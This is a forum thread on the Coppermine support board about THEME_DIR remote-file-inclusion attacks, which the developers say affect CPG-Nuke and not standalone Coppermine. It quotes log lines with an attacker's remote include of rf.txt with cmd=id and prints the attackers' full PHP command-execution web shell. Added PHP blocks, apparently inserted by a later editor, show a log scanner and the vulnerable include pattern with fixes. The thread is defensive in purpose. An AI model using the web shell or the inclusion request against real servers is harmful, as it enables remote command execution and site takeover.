Possible security threat does NOT apply to coppermine standalone

Started by Joachim Müller, June 01, 2004, 08:01:58 AM


Joachim Müller

DeadKenny reported continued attacks on his coppermine standalone install that all failed:
Quote from: DeadKenny
It seems some guys (adolescent jerks) in Brazil are trying to hack my Coppermine.

First I get a bunch of web server entries like this...

200.177.162.14 - - [20/May/2004:08:55:13 +0100] "POST /modules/coppermine/themes/default/theme.php HTTP/1.0" 404 328 "-" "Mozilla 4.0 (Linux)"
200.177.162.14 - - [20/May/2004:08:55:14 +0100] "POST /modules/coppermine/include/init.inc.php HTTP/1.0" 404 324 "-" "Mozilla 4.0 (Linux)"
200.177.162.14 - - [20/May/2004:08:55:15 +0100] "POST /modules/coppermine/themes/coppercop/theme.php HTTP/1.0" 404 330 "-" "Mozilla 4.0 (Linux)"
200.177.162.14 - - [20/May/2004:08:55:16 +0100] "POST /modules/coppermine/themes/maze/theme.php HTTP/1.0" 404 325 "-" "Mozilla 4.0 (Linux)"
200.177.162.14 - - [20/May/2004:08:55:17 +0100] "POST /modules/My_eGallery/public/displayCategory.php HTTP/1.0" 404 331 "-" "Mozilla 4.0 (Linux)"

Which fail miserably because I don't have coppermine in any normal path nor do I use CPGNUKE.

and then I get this...

200.103.127.12 - - [21/May/2004:04:53:29 +0100] "GET http://************//modules/coppermine/themes/default/theme.php?THEME_DIR=http://failiture.webcindario.com/rf.txt?&cmd=id HTTP/1.0" 404 329 "http://************//modules/coppermine/themes/default/theme.php?THEME_DIR=http://failiture.webcindario.com/rf.txt?&cmd=id" "Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.0)"

Again fails thanks to where I keep coppermine.

I have this on two virtual hosts and from a mixture of IP addresses all resolving to .br domains.

He then reports a THEME_DIR hack that is supposed to make Coppermine vulnerable:
Quote from: DeadKenny
Interestingly the THEME_DIR hack is a script allowing some kind of back-door access to your system...

CMD - Rebellious Fingers - We'are: Ackstr0n_X - D3m0n_suspect - Failiture
# CMD PHP :
# Released by : Rebellious Fingers - We'are: Ackstr0n_X - D3m0n_suspect - Failiture

<?
 // CMD - To Execute Command on File Injection Bug ( gif - jpg - txt )
 // $chdir and $cmd arrive from the query string via register_globals (cf. &cmd=id above)
 if (isset($chdir)) @chdir($chdir);
 ob_start();
 system("$cmd 1> /tmp/cmdtemp 2>&1; cat /tmp/cmdtemp; rm /tmp/cmdtemp");
 $output = ob_get_contents();
 ob_end_clean();
 if (!empty($output)) echo str_replace(">", "&gt;", str_replace("<", "&lt;", $output));
?>

#RF
@ irc.brasnet.org
# www.rfcrew.com.br
# Rebellious Fingers - We'are: Ackstr0n_X - D3m0n_suspect - Failiture ::
I did a search on these jerks and all that came up is a large number of sites these idiots have defaced and proudly proclaim they "ownz" them  

I assume people here are aware of this vulnerability?


We (the coppermine dev team) had a look into this - all users of coppermine standalone (with or without bbs integration) can rest assured: the vulnerability does NOT apply to any coppermine standalone version!

Details:
  • our theme files have only functions and variables (no post processing or includes, etc)
  • $THEME_DIR variable is initialized each time from within init.inc.php, which would lead me to think this attack would only work on CPG standalone if we had a file using the templating system to generate output without making an 'in Coppermine' declaration. Even then, the call to init.inc.php should overwrite the $THEME_DIR variable with the correct value
  • 'THEME_DIR' in the theme.php file doesn't even read the GET variables, and is encapsulated. In init.inc.php we have the IN_COPPERMINE check plus it checks to see if 'THEME' is a valid directory, not 'THEME_DIR'
We just wanted to point this out in case someone reads the name "coppermine" on SecurityFocus - they are reporting the CPGNuke problems as Coppermine problems, which is not the case.

GauGau
-Coppermine project manager-
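
Detection logic for the two patterns in DeadKenny's excerpt, added here as an example that is not part of the original thread and not Coppermine code: a PHP scanner over combined-format access-log lines that counts requests to CPG-Nuke module paths (the 404 probes) and flags any request whose query string hands a parameter a remote URL (the THEME_DIR=http://.../rf.txt?&cmd=id inclusion attempt). The sample log lines are constructed after the excerpt, the gallery host name is a placeholder, and the probe-path list and function names are assumptions.

```php
<?php
declare(strict_types=1);

// Added example, not code from the thread or from the Coppermine project.
// It scans combined-format access-log lines for the two behaviours in
// DeadKenny's excerpt: requests to CPG-Nuke module paths (the 404 probes)
// and requests whose query string hands a parameter a remote URL (the
// THEME_DIR=http://.../rf.txt?&cmd=id inclusion attempt). The log lines at
// the bottom are constructed after the ones in the thread; the gallery host
// name is a placeholder. Requires PHP 8 (str_contains).

// Paths that identify a CPG-Nuke/Coppermine probe, taken from the excerpt (assumed list).
const PROBE_PATHS = [
    '/modules/coppermine/themes/',
    '/modules/coppermine/include/init.inc.php',
    '/modules/My_eGallery/',
];

/** Split one combined-log line into fields; null when the line does not match. */
function parseLogLine(string $line): ?array
{
    $re = '/^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) \S+ "[^"]*" "[^"]*"$/';
    if (!preg_match($re, $line, $m)) {
        return null;
    }
    return [
        'ip'     => $m[1],
        'time'   => $m[2],
        'method' => $m[3],
        'target' => $m[4],   // may be an absolute URL on proxy-style requests
        'status' => (int) $m[5],
    ];
}

/** Query string of a request target, whether it is a path or an absolute URL. */
function queryString(string $target): string
{
    $q = strpos($target, '?');
    return $q === false ? '' : substr($target, $q + 1);
}

/** True when any query parameter value starts with a URL scheme: the RFI shape. */
function hasRemoteUrlParam(string $target): bool
{
    foreach (explode('&', queryString($target)) as $pair) {
        $eq = strpos($pair, '=');
        if ($eq === false) {
            continue;
        }
        if (preg_match('#^(https?|ftp)://#i', urldecode(substr($pair, $eq + 1)))) {
            return true;
        }
    }
    return false;
}

/** Path component of a target with any scheme://host prefix and query string removed. */
function requestPath(string $target): string
{
    $path = preg_replace('#^[a-z][a-z0-9+.-]*://[^/]*#i', '', $target);
    $q = strpos($path, '?');
    return $q === false ? $path : substr($path, 0, $q);
}

/**
 * Summarise suspicious activity per client IP: 'probes' counts requests to
 * PROBE_PATHS, 'rfi' lists targets carrying a remote-URL parameter.
 * IPs that showed neither behaviour are dropped from the result.
 */
function scanAccessLog(array $lines): array
{
    $findings = [];
    foreach ($lines as $line) {
        $entry = parseLogLine($line);
        if ($entry === null) {
            continue;
        }
        $ip = $entry['ip'];
        $findings[$ip] ??= ['probes' => 0, 'rfi' => []];
        $path = requestPath($entry['target']);
        foreach (PROBE_PATHS as $probe) {
            if (str_contains($path, $probe)) {
                $findings[$ip]['probes']++;
                break;
            }
        }
        if (hasRemoteUrlParam($entry['target'])) {
            $findings[$ip]['rfi'][] = $entry['target'];
        }
    }
    return array_filter($findings, fn(array $f): bool => $f['probes'] > 0 || $f['rfi'] !== []);
}

// Constructed sample, modelled on the thread's excerpt (gallery host name is a placeholder).
$sample = [
    '200.177.162.14 - - [20/May/2004:08:55:13 +0100] "POST /modules/coppermine/themes/default/theme.php HTTP/1.0" 404 328 "-" "Mozilla 4.0 (Linux)"',
    '200.177.162.14 - - [20/May/2004:08:55:14 +0100] "POST /modules/coppermine/include/init.inc.php HTTP/1.0" 404 324 "-" "Mozilla 4.0 (Linux)"',
    '200.177.162.14 - - [20/May/2004:08:55:17 +0100] "POST /modules/My_eGallery/public/displayCategory.php HTTP/1.0" 404 331 "-" "Mozilla 4.0 (Linux)"',
    '200.103.127.12 - - [21/May/2004:04:53:29 +0100] "GET http://gallery.example.invalid//modules/coppermine/themes/default/theme.php?THEME_DIR=http://failiture.webcindario.com/rf.txt?&cmd=id HTTP/1.0" 404 329 "-" "Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.0)"',
    '198.51.100.7 - - [21/May/2004:09:12:01 +0100] "GET /gallery/displayimage.php?pid=12 HTTP/1.0" 200 4821 "-" "Mozilla/5.0"',
];

foreach (scanAccessLog($sample) as $ip => $f) {
    printf("%-16s probes=%d rfi=%d\n", $ip, $f['probes'], count($f['rfi']));
    foreach ($f['rfi'] as $t) {
        echo "  remote include attempt: $t\n";
    }
}
```

The scanner deliberately ignores the status code: on a standalone install that does not live under /modules/ the probes all return 404, as in the excerpt, but the same requests against a CPG-Nuke install would return 200, and either way the burst from one address is worth an alert. The remote-URL check is what singles out the actual inclusion attempt; the trailing "?" on the THEME_DIR value survives urldecode and is matched as part of the value.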

DeadKenny

Cheers. Thanks for looking into that, I can rest easy now (though with 'modules' in the path I did wonder as coppermine standalone doesn't have that) :)


timdorr

Just FYI for the PostNuke/PHPNuke integration users out there, this was exploited on one of my systems recently. Since no one seems to be giving a fix, here's what you add:

if (!defined('IN_COPPERMINE')) die('Not in Coppermine...');

Just pop that above the global $template, $template_display_picture, $template_image_comments, $template_add_your_comment; line in the modules/coppermine/themes/*/theme.php files and it fixes the security hole.
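
To make the hole and the guard concrete, an added example that is not timdorr's code and not Coppermine's or CPG-Nuke's: a reconstruction in PHP of the include pattern that made a directly requested theme.php exploitable under register_globals, beside the IN_COPPERMINE guard and a stricter allowlisted version. THEME_ROOT, the file name style.inc.php, the theme allowlist and the function names are assumptions for illustration; no function performs a real include, each only returns the path that would have been included.

```php
<?php
declare(strict_types=1);

// Added example, not code from the thread, from Coppermine or from CPG-Nuke.
// It reconstructs the shape of the hole timdorr's one-liner closes: a theme
// file that, when requested directly with register_globals on, builds an
// include path from the request's THEME_DIR and so fetches the attacker's
// rf.txt. The theme root, file names, theme allowlist and helper names are
// assumed for illustration. Nothing here performs a real include: each
// function returns the path that would have been included.

const THEME_ROOT = '/var/www/modules/coppermine/themes/';   // assumed layout

// Vulnerable shape. With register_globals on, ?THEME_DIR=... in the URL
// becomes $THEME_DIR before this code runs; the ?? below stands in for that.
function vulnerableIncludeTarget(array $get): string
{
    $THEME_DIR = $get['THEME_DIR'] ?? THEME_ROOT . 'default/';
    // The attacker ends the value with "?", so the suffix becomes a query
    // string on the remote fetch and the remote server still serves rf.txt.
    return $THEME_DIR . 'style.inc.php';
}

// timdorr's guard: refuse to run unless the including script defined
// IN_COPPERMINE. A direct request to theme.php never has it, so the
// remote path is never built.
function guardedIncludeTarget(array $get, bool $inCoppermine): ?string
{
    if (!$inCoppermine) {
        return null;                      // die('Not in Coppermine...')
    }
    return vulnerableIncludeTarget($get); // path building itself unchanged
}

// Stricter fix: never derive an include path from request data. The theme
// is a name checked against an allowlist and resolved under THEME_ROOT.
function safeIncludeTarget(array $get, bool $inCoppermine, array $allowedThemes): ?string
{
    if (!$inCoppermine) {
        return null;
    }
    $theme = basename((string) ($get['theme'] ?? 'default'));
    if (!in_array($theme, $allowedThemes, true)) {
        $theme = 'default';
    }
    return THEME_ROOT . $theme . '/style.inc.php';
}

// Does a resolved target point off-box (remote include) or outside THEME_ROOT?
function isRemoteOrEscaping(?string $target): bool
{
    if ($target === null) {
        return false;                     // nothing would be included
    }
    return preg_match('#^[a-z][a-z0-9+.-]*://#i', $target) === 1
        || !str_starts_with($target, THEME_ROOT);
}

// Request shape taken from the log line in the thread.
$attack = ['THEME_DIR' => 'http://failiture.webcindario.com/rf.txt?', 'cmd' => 'id'];
$themes = ['default', 'coppercop', 'maze'];   // theme names seen in the probe paths

foreach ([
    'vulnerable, direct request'  => vulnerableIncludeTarget($attack),
    'guarded, direct request'     => guardedIncludeTarget($attack, false),
    'allowlisted, direct request' => safeIncludeTarget($attack, false, $themes),
    'allowlisted, via index.php'  => safeIncludeTarget(['theme' => '../../../etc'], true, $themes),
] as $case => $target) {
    printf("%-28s %s  (%s)\n", $case, $target ?? 'refused', isRemoteOrEscaping($target) ? 'DANGEROUS' : 'ok');
}
```

The vulnerable function hands back the attacker's URL with style.inc.php folded into its query string, which is exactly why the rf.txt? trick works. The guard only closes the direct-request path: when theme.php is pulled in by the gallery's own scripts, $THEME_DIR has been set by init.inc.php as GauGau describes above, so the guard relies on that. The allowlisted version removes the dependency by never building an include path from request data; basename() plus the allowlist also stops the ../ traversal in the last case. On PHP 5.2 and later, allow_url_include=Off (the default) blocks the remote fetch regardless, and register_globals is gone since PHP 5.4, so this shape of bug needs both old PHP and old code.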

Joachim Müller

Urm, just to make this clear: the board you're posting on doesn't deal with the nuked version of coppermine, only the standalone. We have this existing post to point out that the standalone (and that's the only version we can talk about on this board) is not affected by all those bug reports that float around on the internet, warning people not to use coppermine. Those people should more correctly warn not to use phpNuke at all.
Those who read this thread cursorily might get the impression that standalone coppermine was affected, which is not the case - timdorr's posting was well meant, he was trying to help others, but this board is the wrong place for it - better post it on nuke-related sites.

Joachim

ecto

Old thread, I know, but here's some new news.

"Mambo, Coppermine and PHPBB Attacks"

"The attacks have a similar mechanism to the previous awstats and xmlrpc.php attacks that we recorded a few weeks ago, which exploits the input validation vulnerability of the said applications to inject code that then downloads a malware called "listen", very similar to lupii malware."
http://www.philippinehoneynet.org/dataarchive.php?date=2005-12-17

I don't want to start flaming Mr. Talabis (the author) yet, as I haven't looked that closely at the code myself, but I guess his claim that Coppermine is vulnerable to this attack is as invalid as it was over a year ago.

Nibbler

It's about as invalid as you can get - the file that is supposed to have the vulnerability does not exist in Coppermine standalone.

ecto

Heh, of course.. should have seen that one :) And even if it did exist in that directory, it wouldn't be vulnerable.

I sent Mr. Talabis a mail about it, hopefully he'll update the article to avoid worsening Coppermine's reputation.

ecto

I got a response from Mr. Talabis, and he referred me to http://secunia.com/advisories/11524/ . Maybe one of the devs could contact Secunia to update that page, as people obviously still use it for reference, even though it's been 1.5 years since its posting and it still says "Solution Status: Unpatched".

Mr. Talabis suggested that he could update the article and mention that the vulnerability does not apply to the current CPG version, and I kindly asked him to do so.


ecto

Mr. Talabis has updated the article now, but it only states that the current version isn't vulnerable to the attack mentioned. I'd like to know from what version that vulnerability is fixed, so I can tell him to update the article accordingly, and so that people reading it will know if they have an urgent need to upgrade or not.